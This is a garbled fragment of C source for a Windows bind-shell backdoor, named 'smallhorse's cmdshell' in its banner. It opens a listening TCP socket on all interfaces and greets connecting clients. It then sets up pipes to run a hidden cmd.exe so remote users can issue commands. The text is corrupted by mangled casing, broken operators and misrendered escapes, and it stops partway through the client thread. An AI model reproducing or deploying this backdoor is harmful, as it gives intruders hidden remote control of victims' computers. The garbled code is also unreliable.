#include
void OpenDoor () {// initialize Winsock WSADATA wsaData;. SOCKET m_socket, AcceptClient; sockaddr_in Service, Client; int ClientSize, i = 0; int iResult = WSAStartup (MAKEWORD (2,2), & wsaData); if (iResult =! NO_ERROR) RETURN;
// Create a socket m_socket = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);. If (m_socket == SOCKET_ERROR) return; Service.sin_family = AF_INET; Service.sin_addr.s_addr = htonl (INADDR_ANY); Service.sin_port = htons (port );
IF (bind (m_socket, (sockaddr *) & service, sizeof (service)) == SOCKET_ERROR) RETURN; / / Bond IF (Listen (M_Socket, 5) == Socket_ERROR) Return; // Maximum Monitor Column 5 Printf "/ NSMALLHORSE LISTEN ON Port:% D ... ^ * ^ / n", port); clientsize = sizeof (client); while (1) {acceptclient = accept (m_socket, (sockaddr *) & client, & clientsize; if (Acceptclient == Socket_ERROR) RETURN; // Accept the connection printf ("Client Connected./N"); char * sendbuf = "/ ********************** ***************** /// n / tthanks for use ... / n / tsmallhorse's cmdshell! / n / tgood luck! / n // ***** ********************************* // n / n "; send (AcceptClient, Sendbuf, Strlen (SendBuf) ), 0); if (Createthread (NULL, 0, ClientthRead, (LPVOID) & AcceptClient, 0, NULL) == NULL) Printf ("Create Thread Error! / N"); SLEEP (1000);} wsacleanup (); return;} DWORD WINAPI ClientThread (LPVOID lpParam) {int ret; char Buf [1024]; HANDLE Rpipe, Wpipe, Wfile, Rfile; SOCKET acceptClient = (SOCKET) * (SOCKET *) lpParam; SECURITY_ATTRIBUTES sa; sa.nLength = sizeof (sa) ; sa.binherithandle = true; sa.lpsecurityDescriptor = null;
RET = CreatePipe (& RPIPE, & RILE, & SA, 0); RET = CREATEPIPE (& WFile, & Wpipe, & Sa, 0); // Establish two pipes, used to receive commands and display results, respectively
STARTUPINFO startinfo; GetStartupInfo (& startinfo); startinfo.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES; startinfo.hStdInput = Wfile; startinfo.hStdError = startinfo.hStdOutput = Rfile; startinfo.wShowWindow = SW_HIDE;
Char cmdline [max_path]; getSystemDirectory (cmdline, max_path); strcat (cmdline, ("// cmd.exe"));